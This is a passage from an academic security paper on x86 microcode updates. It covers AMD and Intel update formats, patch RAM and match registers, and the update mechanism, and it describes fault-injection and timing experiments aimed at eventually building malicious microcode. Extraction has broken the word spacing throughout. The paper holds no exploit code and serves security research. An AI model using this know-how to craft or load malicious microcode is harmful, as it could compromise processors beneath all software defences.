privileges (ring zero) are required to up date pro cessor micro co de, this attac k cannot b e easily mitigated
due to the implemen tation of micro co de up date functionalit y within pro cessor silicon. A dditionally , w e
rev eal the microarc hitecture and mec hanism of micro co de up dates, presen t a securit y analysis of this
attac k v ector, and pro vide some mitigation suggestions. A to ol for parsing micro co de up dates has b een
made op en source, in conjunction with a listing of our dataset1.
1 In tro duction
Since the 1970's, pro cessor man ufacturers ha v e deco ded the x86 instruction set arc hitecture b y in ternally
decomp osing x86 complex instruction set arc hitecture (CISC) instructions in to a sequence of simplied
reduced instruction set computing (RISC) micro-op erations (uops), in order to ac hiev e greater p erformance
and eciency [1]. In doing so, micro co de w as in tro duced to help translate v ariable-length x86 instructions
in to a sequence of xed-length micro-op erations suitable for parallel execution b y in ternal RISC execution
units. By separating instruction deco de and execution from the ph ysical la y out of pro cessing logic, this new
approac h allo w ed for b etter implemen tation of m ulti-step CISC instructions, including optimization of the
instruction execution sequence through tec hniques suc h as micro/macro-op fusion. Although this micro co de
w as initially implemen ted on read-only memory , pro cessor man ufacturers so on in tro duced writable patc h
memory to pro vide an up date mec hanism for implemen ting dynamic debugging capabilities and correcting
pro cessor errata, esp ecially after the infamous P en tium FDIV bug of 1994. The rst kno wn implemen tations
of these micro co de up date mec hanisms w as with In tel's P6 (P en tium Pro) microarc hitecture in 1995 [27],
A dv anced Micro Devices's (AMD's) K7 microarc hitecture in 1999, and VIA's Nano in 2008 [2]. P erhaps
ironically , AMD's K7 pro cessors fails to prop erly v alidate the micro co de patc h RAM during built-in self-test
(BIST), causing the micro co de up date mec hanism itself to b e listed as a pro cessor errata [2]. Due to the
v olatile nature of this patc h RAM, micro co de up dates do not p ersist after pro cessor reset, although they
are un touc hed b y pro cessor INIT [31]. As a result, micro co de up dates are t ypically in tegrated in to the
motherb oard basic input/output system (BIOS), whic h is resp onsible for selecting the appropriate up date
and applying it during system p o w er-on self-test (POST). Ho w ev er, since the motherb oard BIOS is rarely
up dated b y end-users or system administrators, most con temp orary op erating systems (e.g. Lin ux, Solaris,
1https://www.github.com/ddcc/microparse
1
Windo ws) also include up date driv ers to p erform micro co de up dates during system startup using the same
up date mec hanism. This mec hanism is also accessible from within a virtualized en vironmen t, but should
b e ltered out b y a w ell-designed h yp ervisor. On con temp orary systems with symmetric m ultipro cessing
(SMP), this mec hanism should b e executed sync hronously on eac h logical pro cessor (with the exception of
In tel Hyp er-Threading) to ensure that execution b eha vior is uniform.
2 Related W ork
The basic principles b ehind this attac k v ector can b e traced bac k to Ken Thompson's classic 1984 w ork, whic h
prop osed the concept of a malicious compiler undetectable ev en b y source co de analysis [42]. Ho w ev er, b y
utilizing malicious micro co de up dates, this attac k v ector can b e extended to compromise pro cessor hardw are,
sev erely impacting the securit y of existing computer systems.
Although hardw are solutions ha v e b een dev elop ed to enforce trusted computing, suc h as trusted platform
mo dules (TPM) and unied extensible rm w are in terface (UEFI) secure b o ot, the established c hain of trust
fails to accoun t for securit y vulnerabilities within em b edded rm w are. In fact, these em b edded vulnerabilities
are m uc h more common than one migh t think, as recen t researc h has demonstrated the p oten tial for malicious
soft w are to b e em b edded within net w ork con trollers [19], storage devices [17], and other p eripherals [39]. A t
the same time, man y of these trusted computing solutions ha v e b een sho wn to b e themselv es a w ed, with
demonstrated vulnerabilities within b o otloaders, trusted platform mo dules, BIOS's [33], and ev en hardw are-
assisted trust solutions suc h as In tel T rusted Execution T ec hnology [43].
T o the b est of our kno wledge, no other published w ork has comprehensiv ely analyzed pro cessor micro co de
from a securit y p ersp ectiv e, lik ely due to the proprietary nature of pro cessor microarc hitecture and micro co de.
Although v ery little information is publicly a v ailable ab out the instruction enco ding format of micro co de
and its op erational mec hanisms, implemen tation information is a v ailable within the IntelR⃝64 and IA-32
A r chite ctur es Softwar e Develop er's Manual , the AMDR⃝AMD64 A r chite ctur e Pr o gr ammer's Manual, and
the AMDR⃝BIOS and Kernel Develop er's Guide (BKDG). Pro duction co de implemen ting micro co de up date
functionalit y is also pro vided b y the op en-source Lin ux k ernel and Coreb o ot pro jects. In addition, certain
arc hitectural details are a v ailable in industry paten t lings.
Nev ertheless, there has b een some high-lev el analysis of pro cessor micro co de. A basic analysis of the
metadata accompan ying In tel micro co de up dates w as published b y Molina and Arbaugh in 2000, determining
the purp ose of certain elds within the micro co de up date header [35]. Lik ewise, an anon ymous rep ort
published in 2004 pro vided similar information ab out AMD micro co de up dates [5]. More recen tly , a tec hnical
rep ort published b y Ha wk es in 2013 disco v ered the presence of additional metadata within the In tel micro co de
up date binary , suggesting that recen t In tel micro co de up dates are cryptographically v eried using a RSA
signature with a non-standard SHA hash algorithm [26].
3 Microarc hitecture
Individual instructions within the x86 instruction set arc hitecture can range from an ywhere b et w een one to
fteen b ytes, although the general enco ding format remains constan t. Instructions consist of a one or t w o b yte
op eration co de (op co de), a register or memory op erand b yte (mo dR/M), a scale-index-b yte addressing (SIB)
b yte, and m ultiple displacemen t and/or immediate b ytes. In addition, instructions can also b e prep ended
b y prex b ytes that denote sp ecial rep etition or memory addressing b eha vior, suc h as that p erformed b y the
REP or LOCK instruction prexes.
During eac h instruction cycle, the pro cessor fetc hes blo c ks of instructions from system memory , whic h
are then segmen ted and stored within L1 instruction cac he (trace cac he). This step iden ties and tags
instruction b oundaries, and also pro vides additional hin ts for branc h prediction and instruction execution.
Next, instructions are deco ded from the cac he and placed in to dedicated issue p ositions at reserv ation stations
for register renaming, then nally dispatc hed to functional units b efore retiring. On mo dern sup erscalar
2
Listing 1: Implemen tation for MO VS in AMD pro cessors
L D D F ; l o a d d i r e c t i o n f l a g t o l a t c h i n f u n c t i o n a l u n i t
O R e c x , e c x ; t e s t i f E C X i s z e r o
J Z e n d ; t e r m i n a t e s t r i n g m o v e i f E C X i s z e r o
l o o p :
M O V F M + t m p 0 , [ e s i ] ; m o v e t o tmp d a t a f r o m s o u r c e a n d i n c / d e c E S I
M O V T M + [ e d i ] , t m p 0 ; m o v e t h e d a t a t o d e s t i n a t i o n a n d i n c / d e c EDI
D E C X J N Z l o o p ; d e c E C X a n d r e p e a t u n t i l z e r o
e n d :
E X I T
pro cessors, these steps do not necessarily o ccur sequen tially , as concurren t dispatc h and out of order execution
allo w for pip eline optimizations to maximize throughput.
Simple instructions are directly deco ded in to a short sequence of xed-length RISC-lik e op erations (also
kno wn as R OPs, uops, or Cops) b y hardw are, whereas complex instructions are deco ded b y micro co de R OM.
Examples of the former include ADD , XOR , and JMP , while the latter include MOVS, REP , and CPUID. F or a more
complete list, see [21].
As can b e seen from the published MOVS micro co de implemen tation for AMD pro cessors (listing 1),
micro co de instructions (microinstructions) are the basic arithmetic, data, and con trol op erations that com-
p ose regular x86 instructions [34]. A published m ultiw a y branc h implemen tation of the RDMSR and RDTSC
instructions sho ws the same to b e true for In tel pro cessors [25].
3.1 Capabilities
Ov er time, micro co de has b ecome resp onsible for handling more and more in ternal pro cessor op erations.
Originally , it w as primarily used to handle illegal op co des or complex x86 instructions, suc h as oating-p oin t
op erations, MMX primitiv es [32], and string mo v e using the REP prex [28]. More recen tly , it has b een used
to implemen t instruction set extensions suc h as A VX [30] and VT-d b y handling the sp ecial virtual mac hine
primitiv es VMREAD, VMWRITE, and VMPTRLD [4]. In addition, it is also resp onsible for sa ving pro cessor state,
managing cac he op eration, and handling in terrupts with resp ect to C-states (p o w er sa ving) and P-states
(v oltage/frequency op erating p oin t), e.g. ushing the L2 cac he up on en try in to or exit from C4 state [3] [37].
On new er In tel pro cessors, including the Nehalem microarc hitecture, pro cessor micro co de has b een further
enhanced to incorp orate breakp oin t functionalit y , allo wing the micro co de to in tercept and mo dify requests
made to platform devices. Not only is this triggering functionalit y capable of capturing short amoun ts of
data or pulsing an externally-visible pin, but it can also send information ab out in ternal con trol o ws and
transactions during execution, suc h as exp osing accesses to mac hine state registers, results of I/O op erations,
and page fault information (including address) [20].
3.2 AMD
On AMD pro cessors, instructions are categorized in to one of t w o deco de path w a ys: fastpath and micro co de
R OM (MR OM) [23] [10].2In order to determine the address of the micro co de en tries in MR OM that
corresp ond to an MR OM instruction, the MR OM en try p oin t unit utilizes the op co de, mo d-R/M, and
prex b ytes of the x86 instruction to generate the appropriate en try p oin t microaddress. Note, that this
microaddress do es not necessarily corresp ond to a single micro co de instruction, but rather to a line of R OPs
in MR OM (also kno wn as micro co de instructions), where the n um b er of micro co de instructions is equal to
the n um b er of functional units within the pro cessor. Because certain microarc hitectures ha v e three functional
2There also exists a third path w a y consisting of mixed fastpath and MR OM instructions kno wn as double dispatc h that is
used to maximize dispatc h bandwidth.
3
units p er logical pro cessor, a line of micro co de instructions in MR OM can also b e referred to as a triad.
Belo w is a diagram sho wing the la y out of a micro co de triad (table 1).
Field Size
Op eration 1 8
Op eration 2 8
Op eration 3 8
Sequence Con trol 4
T able 1: Structure of micro co de triad
Not all MR OM instructions can b e implemen ted b y a single line of micro co de instructions, so an additional
sequence con trol eld is app ended to eac h triad in order to determine the microaddress of the next triad.
Usually , this corresp onds to the microaddress of the next triad, but is not necessarily true for micro co de
instructions that alter the micro co de con trol o w, suc h as branc hing or jumping instructions. In addition,
if the next triad is the last line of micro co de for a resp ectiv e MR OM instruction, then sequence con trol
is resp onsible for enco ding an early exit signal that noties selection con trol to pac k additional fastpath
instructions in to v acan t issue p ositions for execution during the curren t clo c k cycle. As a result, this sequence
con trol eld is used to store information related to branc h prediction, con trol o w op erations, and early exit
signals.
Since the MR OM is read-only and utilizes a xed mapping from MR OM instructions to micro co de
instructions, micro co de R OM cannot b e directly mo died after man ufacture to address unin ten tional bugs
in micro co de or implemen t new functionalit y for debugging. As a result, a micro co de patc h RAM is attac hed
to the MR OM to allo w for mo dications to existing micro co de instructions. The memory space of this
com bined micro co de storage is t ypically from 000h to C3Fh, with the lo w er 3072 triads from 000h to BFFh
mapp ed to micro co de R OM, and the upp er 64 triads from C00h to C3Fh mapp ed to patc h RAM. In ternally ,
this ma y b e implemen ted using t w o pairs of ash memory [16]. In addition, eigh t matc h registers with
functionalit y similar to breakp oin ts are added to the pro cessor, and can b e set b y a micro co de up date (also
kno wn as a micro co de patc h).
During execution of micro co de instructions, if the curren t microaddress matc hes that of an address stored
in a matc h register, execution jumps to a xed oset in micro co de patc h RAM to execute the patc h. These
xed osets are sho wn in the jump table for eac h matc h register (table 2) [34]. T o disable a matc h register,
it is simply set to an address outside of the micro co de memory space, e.g. FFFFFFFFh (-1), whic h will nev er
matc h.
Matc h Register RAM Oset
Matc h 1 00h
Matc h 2 02h
Matc h 3 04h
Matc h 4 06h
Matc h 5 08h
Matc h 6 0ah
Matc h 7 0c h
Matc h 8 0eh
T able 2: Micro co de en try p oin t jump table
3.3 In tel
Although the microarc hitecture of In tel pro cessors is not as w ell publicly do cumen ted, o v erall it app ears
to b e quite similar. Regular x86 instructions (also kno wn as macroinstructions) can b e deco ded either b y
4
hardw are or b y the MR OM, whic h issues a sequence of preprogrammed uops to complete the op eration [28].
Hardw are instructions are generally of three uops or shorter, whereas MR OM instructions are either longer
than four uops or not enco dable within the trace cac he [8].
In ternally , there also exists a small patc h RAM in addition to the MR OM, whic h ma y b e implemen ted
b y attac hing a separate memory to the micro co de R OM [15]. W e b eliev e that this memory space is also
con tiguous or otherwise cross-addressable in order to facilitate jumps from patc h RAM to MR OM. On
the P6 microarc hitecture, the patc h RAM is capable of holding up to 60 microinstructions, with patc hing
implemen ted b y pairs of matc h and destination registers. When the curren t microaddress matc hes the
con ten ts of a matc h register, execution con tin ues at the asso ciated destination register, instead of the xed
osets used in AMD micropro cessors [29].
4 Micro co de Up dates
4.1 Up date Structure
Since micro co de up dates are sp ecic to the microarc hitecture of a pro cessor, an iden tifying pro cessor signa-
ture v alue is used to determine compatibilit y . This signature is a 32-bit in teger that enco des the stepping,
mo del, family , t yp e, extended mo del, and extended family information of the pro cessor, and can b e obtained
in soft w are b y setting the EAX register to 1, executing the CPUID instruction, and then reading bac k the
con ten ts of the EAX register. As suc h, this v alue is also sometimes kno wn as simply the CPUID.
Due to the c hallenge of distributing micro co de up dates individually b y CPUID, pro cessor man ufacturers
instead distribute up date pac k ages, from whic h the micro co de up date driv er is resp onsible for selecting
and loading the correct up date. These up date pac k ages can b e found on the w ebsites of eac h pro cessor
man ufacturer3 4. Since this format diers for eac h, they will b e treated separately .
4.1.1 AMD
There exist three v arieties of AMD micro co de up date pac k ages, with one targeted for the Solaris op erating
system5, and t w o targeted for the Lin ux op erating system on 15h and non-15h microarc hitectures, resp ec-
tiv ely . All of these pac k ages are in little-endian binary format with a short header (table 3), follo w ed b y
a table mapping from pro cessor signatures to pro cessor revision ID's (table 4), whic h eliminates duplicate
micro co de up dates used b y m ultiple pro cessors from the same microarc hitecture but with dieren t pro cessor
signatures. Then, eac h individual micro co de up date is prep ended b y a short header (table 5) that sp ecies
the size of the follo wing micro co de up date, allo wing the up date driv er to easily iterate through the micro co de
up date pac k age.
Field Size V alue (T ypical)
Magic Num b er 4 AMD\0
T able T yp e 4 0h
T able Size 4 V aries
T able 3: Structure of micro co de up date pac k age header
Eac h micro co de up date consists of a header (table 6) follo w ed b y patc h data. On new er microarc hitec-
tures, the patc h data and certain metadata elds is observ ed to b e encrypted. In addition to the matc h
register elds discussed earlier, the header also con tains an initialization ag eld that sp ecies whether mi-
cro co de instructions lo cated at the xed oset 10h should b e immediately executed after a micro co de up date
applied. This is used to correct pro cessor errata not directly caused b y a misco ded instruction, p ossibly b y
3AMD: http://www.amd64.org/microcode.html
4In tel: https://downloadcenter.intel.com/Detail_Desc.aspx?agr=Y&ProdId=3425&DwnldID=22508
5These w ere not analyzed.
5
Field Size V alue (T ypical)
Pro cessor Signature 4 V aries
Errata Mask 4 0h
Errata Compare 4 0h
Pro cessor Revision ID 2 V aries
Unkno wn 2 0h
T able 4: Structure of micro co de up date pac k age table en try
Field Size V alue (T ypical)
T yp e 4 1h
Up date Size 4 V aries
T able 5: Structure of header prep ended to eac h micro co de up date
mo difying an in ternal conguration register to disable optimizations that result in incorrect cac he handling
or p o w er managemen t b eha vior.
Field Size
Date 4
P atc h ID 4
P atc h Data ID 2
P atc h Data Length 1
Initialization Flag 1
P atc h Data Chec ksum 4
North bridge Device ID 4
South bridge Device ID 4
Pro cessor Revision ID 2
North bridge Revision 1
South bridge Revision 1
BIOS API Revision 1
Reserv ed 3
Matc h Register 1 4
Matc h Register 2 4
Matc h Register 3 4
Matc h Register 4 4
Matc h Register 5 4
Matc h Register 6 4
Matc h Register 7 4
Matc h Register 8 4
T able 6: Structure of AMD micro co de up date header
Other headers elds include the north bridge, south bridge, and BIOS API revision and/or ID elds, whic h
app ear to pro vide a mec hanism for restricting micro co de up dates to sp ecic com binations of pro cessors and
platform hardw are, but ha v e not b een observ ed to actually b e used (or implemen ted within the Lin ux up date
driv er). In addition, there exists a patc h length eld that sp ecies the n um b er of lines of patc h data, and
a c hec ksum eld that is calculated b y taking the sum of the patc h data as a sequence of 32-bit in tegers.
F urthermore, a pro cessor revision ID eld mapp ed from the pro cessor signature is used to ensure that a
micro co de up date is b eing loaded on to the correct pro cessor microarc hitecture, a patc h ID eld is used
to sp ecify the micro co de up date revision, and a patc h data ID eld is used to v erify compatibilit y of the
6
micro co de patc h format with the in ternal micro co de patc h mec hanism.
4.1.2 In tel
In con trast to the binary format of AMD micro co de up date pac k ages, In tel micro co de up date pac k ages are
distributed in plain-text form, with eac h micro co de up date is represen ted as ro ws of 32-bit big-endian in tegers
in four hexadecimal columns separated b y commas. C-st yle commen ts are used to denote non-micro co de
con ten t, suc h as original lenames or dates. Ho w ev er, there do es exist some older micro co de up dates that
are distributed individually as binary les in little-endian format. It is b eliev ed that this reects the format
in whic h In tel distributes individual micro co de up dates directly to industry partners.
Eac h individual micro co de up date consists of a header (table 7) follo w ed b y patc h data. Although ocial
do cumen tations mak es reference to an extended up date format with an optional extended signature table
section [31], to the b est of our kno wledge this extended format has nev er b een publicly used. In addition,
the patc h data has alw a ys b een observ ed to b e encrypted or otherwise obfuscated.
Field Size
Header V ersion 4
Up date Revision 4
Date 4
Pro cessor Signature 4
Chec ksum 4
Loader Revision 4
Pro cessor Flags 4
Data Size 4
T otal Size 4
Reserv ed 12
T able 7: Structure of In tel micro co de up date header
Instead of using something similar to AMD's pro cessor revision ID eld, a pro cessor signature is directly
stored in the micro co de up date header to determine compatibilit y b et w een an individual micro co de up date
and the curren t pro cessor. In addition, a pro cessor ags eld is used to further dieren tiate b et w een m ultiple
pro cessors with the same pro cessor signature. Compatibilit y is v eried b y left shifting the v alue 1h b y the
3-bit platform ID stored in bits 50 - 52 of MSR 00000017h , then computing the bit wise AND of this v alue
with the pro cessor ags eld of the up date header, and c hec king if the result is nonzero. There also exists
an up date revision eld that sp ecies the revision of the micro co de up date.
In addition, micro co de up dates for new er pro cessors b elonging to the A tom, Nehalem, and Sandy Bridge
microarc hitectures con tain an additional undo cumen ted header within the up date data blo c k (table 8).
Previous rev erse engineering has determined that this header includes additional date, up date revision,
up date length, and pro cessor signature elds, as w ell as a 520 b yte blo c k con taining a 2048-bit RSA mo dulus
that app ears to b e constan t within eac h pro cessor family . This is follo w ed b y a four b yte RSA exp onen t with
the xed v alue 11h , as w ell as a RSA signature computed using SHA-1 or SHA-2 hash algorithm [26]. This
information corresp onds with that published in other sources, whic h indicate that a SHA-1 hash digest ma y
b e generated after the patc h data is encrypted using a symmetric blo c k cipher suc h as AES or DES [40].
4.2 Up date Mec hanism
The micro co de up date mec hanism is v ery similar across all x86 pro cessor man ufacturers, primarily b y using
pro cessor mo del-sp ecic register (MSR) registers to read the curren t micro co de revision and write the new
micro co de up date. Belo w are the appropriate MSR registers for eac h (table 9).
F ollo wing is the general micro co de up date pro cess, with in tegrit y and v erication c hec ks omitted.
7
Field Size V alue (T ypical)
Unkno wn 1 4 0h
Magic Num b er 4 a1h
Unkno wn 3 4 20001h
Up date Revision 4 V aries
Unkno wn 4 4 V aries
Unkno wn 5 4 V aries
Date 4 V aries
Up date Length 4 V aries
Unkno wn 6 4 1h
Pro cessor Signature 4 0h
Unkno wn 7 56 0h
Unkno wn 8 16 V aries
RSA Mo dulus 256 V aries across pro cessor family
RSA Exp onen t 4 11h
RSA Signature 256 V aries
T able 8: Structure of undo cumen ted additional In tel micro co de up date header
Man ufacturer Revision Up date Status
AMD 8bh c0010020h N/A
In tel 8bh 79h N/A
VIA 8bh 79h 1205h
T able 9: Micro co de up date MSR registers
1. Clear EAX ,read the curren t pro cessor signature using CPUID, and load the matc hing micro co de up date
in to k ernel memory . On In tel pro cessors, also c hec k that the pro cessor ags eld matc hes.
2. Clear EAX and EBX , and read the curren t micro co de revision using RDMSR from the revision MSR.
3. W rite the memory address of the micro co de up date using WRMSR to the up date MSR. On In tel pro ces-
sors, also p erform CPUID with EAX = 1 to sync hronize eac h logical pro cessor.
4. Read the new micro co de revision, and return success if it matc hes that of the up date. Otherwise,
return failure.
4.3 Up date Driv er
4.3.1 Lin ux
Micro co de up dates on Lin ux are p erformed b y the in-tree microcode k ernel mo dule, whic h supp orts b oth
AMD and In tel pro cessors. F or AMD pro cessors, note that only microarc hitectures 10h and later are
supp orted, ev en though the up date mec hanism is the same on the earlier K8 and 0fh microarc hitectures.
When the mo dule is rst loaded, micro co de up dates for the system are automatically loaded from either
the amd-ucode or intel-ucode directories within the lo cal Lin ux rm w are rep ository , e.g. /lib/firmware/.
T ypically , this pro cess o ccurs during k ernel initialization, since the up date mo dule and micro co de up date
les can b e in tegrated in to the b o ot initr amfs image.
While AMD micro co de pac k ages can b e automatically parsed and loaded b y this mo dule, In tel micro co de
pac k ages need to rst b e pro cessed b y the usermo de iucode-tool (previously microcode.ctl ), whic h ex-
tracts the appropriate micro co de up dates for the installed pro cessor(s) from the up date pac k age, con v erts
them in to binary format, and places them in the rm w are directory with the correct naming con v en tion.
8
Once the mo dule has b een loaded, up dates can also b e triggered via sysfs at /sys/devices/system/cpu/m
icrocode/reload. The curren t micro co de revision and pro cessor ags are also exp orted to processor_flags
and flags for eac h logical pro cessor at /sys/devices/system/cpu<number>/microcode/.
4.3.2 Windo ws
Although less w ell do cumen ted, micro co de up dates are p erformed b y bundled device driv ers on Windo ws XP
and later. Unlik e the Lin ux up date mo dule, these Windo ws driv ers ha v e binary micro co de up dates in tegrated
within the .data or PAGELK segmen ts, and cannot load micro co de from man ufacturer-supplied up date pac k-
ages. After a micro co de up date is successfully loaded, these driv ers up date pro cessor conguration v alues
stored in the registry6.
Belo w are the micro co de up date driv er v ersions bundled within recen t v ersions of the Windo ws op erating
system (listing 10).
OS Filename V ersion Date
Windo ws XP (SP3) update.sys (In tel only) 5.1.2600.5512 2008-04-14
Windo ws 7 (SP1) mcupdate_AuthenticAMD.dll 6.1.7600.16385 2009-07-13
Windo ws 7 (SP1) mcupdate_GenuineIntel.dll 6.1.7601.17514 2010-11-20
Windo ws 8.1 mcupdate_AuthenticAMD.dll 6.3.9600.16384 2013-08-22
Windo ws 8.1 mcupdate_GenuineIntel.dll 6.3.9600.16384 2013-08-22
T able 10: Windo ws micro co de up date driv er v ersions
Sp ecically , w e note that v ery few AMD micro co de up dates are bundled within recen t v ersions of the
Windo ws op erating system, and none at all with Windo ws XP . F or example, Windo ws 7 (SP1) includes only
three AMD micro co de up dates (table 11). In addition, the bundled micro co de up dates do not app ear to
ha v e b een regularly up dated to align with new up date pac k ages released b y AMD. Ho w ev er, signican tly
more In tel micro co de up dates are included (table 14).
Date Pro cessor Revision P atc h ID Chec ksum
2008-03-06 00002031h 02000032h 83faeah
2008-04-30 00001022h 01000083h 074388a8h
2008-05-01 00001020h 01000084h 1fcc8590h
T able 11: Micro co de bundled within mcupdate_AuthenticAMD.dll
5 Metho dology
An o v erview of our metho dology is sho wn in gure 1.
As a preliminary step, w e b egun b y conducting a literature review of published researc h analyzing pro-
cessor micro co de. Ho w ev er, since this sub ject is proprietary and relativ ely undo cumen ted, w e w ere forced to
expand the scop e of our searc h to include alternativ e sources of do cumen tation. This encompassed industry
paten ts assigned to A dv anced Micro Devices and In tel Corp oration published b oth domestically and abroad,
and tec hnical do cumen tation published b y b oth v endors, as w ell as source co de from the Lin ux k ernel and
Coreb o ot pro jects that implemen t supp ort for micro co de up dates.
Due to the presence of micro co de encryption and in tegrit y v erication mec hanisms, w e b egan b y searc hing
the w eb for preexisting micro co de up dates to analyze. T argeted searc h engine queries allo w ed us to lo cate
micro co de up dates publicly a v ailable on the w ebsites of pro cessor man ufacturers, as w ell as those hosted
b y third part y dev elop ers or rm w are mo dders. Since man y of these sites are no longer online, historical
6HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor
9
Tool 
DevelopmentResource 
GatheringBackground 
Information
PatentsMicrocode 
UpdatesMicroparse
Hardware 
WatchdogProcessor 
ManufacturersOEM BIOSSource Code
Technical 
ManualsMicrocode 
ErrataAutomated 
Testing
Fault Injection
Random 
Microcode 
GenerationManual 
Analysis
Binary 
DifferencingMicrocode 
Entry Point 
Generation
Microcode 
Instruction 
FormatEncryption 
MechanismsFigure 1: Ov erall analysis metho dology
databases suc h as the In ternet Arc hiv e w ere helpful in lo cating micro co de no longer directly a v ailable. Binary
micro co de up dates w ere also committed in to the source co de rep ositories for v arious op en source pro jects
suc h as Lin ux and Coreb o ot, whic h w ere useful for extraction and analysis.
Next, w e dev elop ed a custom to ol written in Python, named microparse, to in terpret and mo dify the
structure of individual micro co de up dates and micro co de up date pac k ages, whic h w e used to extract and
catalog the published up dates that had b een gathered. This to ol has b een made op en source, and is a v ailable
online together with catalog data7. After determining particular microarc hitectures of in terest, w e lo ok ed
for do cumen tation on pro cessor errata to determine the c hanges made in eac h micro co de up date revision,
whic h w ere then compared against eac h other to determine the structure of the binary micro co de patc h.
In man y cases, these up dates app eared to b e encrypted due to signican t dierences in the binary patc h
data b et w een revisions, with the few similarities that o ccurred a statistical result of the birthda y parado x.
A t this p oin t, w e w ere able to apply fault injection tec hniques and analyze the dierences in timing to
c haracterize the encryption mec hanism b eing utilized. This w as ac hiev ed b y mo difying the Lin ux micro co de
up date mo dule to time the up date using the RDTSC instruction, whic h returns the v alue of the time stamp
coun ter (TSC), a 64-bit register that records the n um b er of pro cessor cycles p erformed since reset. In order
to ensure that this time is accurate, w e execute and store the v alues of RDTSC t wice b efore p erforming
the up date, then once after the up date, allo wing us to subtract the time required b y RDTSC from the nal
result [25]. A usermo de script congured to run at system startup w as used to p erm ute the micro co de
up date, p erform the up date, record the result, and then restart the system. This sequence of steps is sho wn
b elo w:
1. Bo ot system with initial micro co de revision.
2. Automatically load mo died microcode k ernel mo dule.
3. Start script microcode_fault.py.
(a) Reset hardw are w atc hdog timer.
(b) Chec k if nished, otherwise incremen t the try coun ter for curren t bit oset. If at or b ey ond the
coun ter threshold, reset the try coun ter and incremen t the curren t bit oset.
(c) Send curren t status to remote w ebserv er.
(d) Create a mo died micro co de up date le.
(e) Read curren t micro co de revision.
(f ) T rigger k ernel micro co de up date.
4. Read mo died micro co de up date le from k ernel mo dule.
(a) Record time stamp coun ter.
7https://www.github.com/ddcc/microparse
10
(b) Record time stamp coun ter.
(c) P erform micro co de up date.
(d) Record time stamp coun ter.
(e) Compute dierence b et w een rst t w o and last t w o readings, then output the dierence of these
t w o computations.
5. P arse system log for output dierence from script.
(a) If successful, write the result (previous micro co de revision, curren t micro co de revision, and cycle
dierence) to le, and set the curren t try coun ter to max. Otherwise, store the k ernel log.
(b) Delete the mo died micro co de up date le.
(c) Restart the system.
F or the older AMD up dates that w ere not encrypted, w e w ere able to apply frequency analysis to obtain an
o v erall idea of the structure of the micro co de up dates, whic h w as then com bined with bac kground kno wledge
to determine sp ecic information ab out the structure of eac h micro co de line. F urther fault injection testing
w as also p erformed to determine the function of other structures that w ere not do cumen ted. This w as
ac hiev ed b y p erforming bruteforce testing on certain elds of the micro co de up date; for example, lling
the up date with in v alid data, setting the matc h registers to a microaddress, and then executing a sp ecic
instruction to determine if the system crashes. Rev erse engineering of pro cessor microarc hitecture and
micro co de up dates w as necessary in order to determine ho w the micro co de up date mec hanism within the
pro cessor functioned. Due to a lac k of public do cumen tation on the op eration of this mec hanism, careful
analysis of tec hnical do cumen tation and industry paten t lings w as required to determine the lo cation and
capabilities of micro co de in the instruction deco de step of pro cessor co de execution. F ault injection testing
w as used to determine the scop e and mec hanism of micro co de in tegrit y v erication mec hanisms, including
encryption and/or obfuscation.
Since this pro cess could result in system instabilit y , w e designed a hardw are w atc hdog timer comm u-
nicating o v er USB using a FTDI FT232R and an A tmel A Ttin y2313a. If the system failed to reset the
w atc hdog timer within a preset time in terv al, then the w atc hdog w ould cause a solid state rela y to trigger
the motherb oard p o w er or reset switc h input. Belo w is a sc hematic of the design (gure 2).
W e also attempted to dev elop our o wn micro co de up dates in order to iden tify the format of the in ternal
micro co de instruction set, with the o v erall goal of dev eloping a pro of of concept malicious micro co de up date.
This w ork is still ongoing.
T esting w as p erformed on the follo wing systems (table 12), whic h include pro cessors man ufactured b y
b oth AMD and In tel. The soft w are used for testing w as a standard distribution of Ubun tu 12.10, alb eit with
a mo died Lin ux 3.8.13 k ernel.
Man ufacturer Arc hitecture Pro cessor CPUID
AMD K8 A thlon 64 X2 4800+ 60fb2h
AMD 10h Phenom X3 8650 100f22h
AMD 10h Phenom I I X6 1045T 100fa0h
AMD 12h A8-3850 X4 300f10h
AMD 15h FX-4100 600f12h
In tel P6 P en tium I I 233 (80522) 634h
In tel Sandy Bridge Core i3-330M 20652h
In tel Sandy Bridge Core i5-2500k 206a7h
T able 12: Listing of micropro cessors that w ere tested
11
Figure 2: Sc hematic of w atc hdog timer
6 Results
6.1 AMD
Due to the lac k of publicly released AMD micro co de up dates, w e w ere able to only gather a dataset of
44 unique micro co de up dates. These up dates date from F ebruary 6, 2004 through Marc h 3, 2013, and
span the K8 (2003) through 15h (2013) microarc hitectures. Note that no micro co de up dates app ear to b e
publicly a v ailable for the 16h (2014) microarc hitecture. Using the pro cessor signature to pro cessor revision ID
mapping tables, w e observ ed a n um b er of pro cessor signatures that do not exist in an y public CPU databases8,
indicating that they lik ely corresp ond to in ternal testing or engineering sample pro cessors. Strangely enough,
w e also observ e one micro co de up date with an in v alid date within the date metadata eld, lik ely caused b y
a man ual error during the release pro cess.
In particular, w e observ e four distinct categories of micro co de up dates, based on the v alue of the patc h
data ID metadata eld. The corresp onding c haracteristics are summarized in table 13.
Based on our fault injection testing results, only the c hec ksum, patc h data ID, patc h data length, up date
revision, and pro cessor revision ID metadata elds are parsed for micro co de up dates with patc h data ID
8000h and 8003h. Up dates with patc h data ID 8003h app ear to supp ort wildcard matc hing using the latter
8e.g. http://www.cpu- world.com , http://www.etallen.com/cpuid.html
12
P atc h Data ID Microarc hitecture Encryption Memory Space
8000h K8, 0fh, 10h, 11h N 000h - C3Fh
8001h 14h Y ?
8002h 15h Y ?
8003h 12h N 00000000h - FFFFFFFFh
T able 13: Listing of AMD patc h data id's and microarc hitectures
16-bits of the matc h register, p ossibly due to the presence of an on-die graphics engine. In con trast, all
elds are ignored for micro co de up dates with patc h data ID 8001h, except for the three unkno wn elds that
remain set to aah , and the encrypted matc h register elds. The same is true for micro co de up dates with
patc h data ID 8002h, except that the three unkno wn elds are no w set to zero.
F ault injection tests on the 15h microarc hitecture clearly demonstrate the presence of encryption (g-
ure 3), as the up dates m ust rst b e decrypted b efore metadata elds can b e v eried. These results sho w that
the micro co de up date mec hanism tak es on a v erage 753913 cycles, with a sample standard deviation of 114841
of cycles. Note that bit osets 480 through 495 corresp ond to the patc h data ID eld, with mo dications to
this eld resulting in early termination with an a v erage of 628 cycles, lik ely due to the mo died up date no
longer app earing compatible with the in ternal micro co de up date mec hanism. Bit osets 672 through 2719
corresp ond to the matc h registers at the end of the header through the binary patc h data. Changes to this
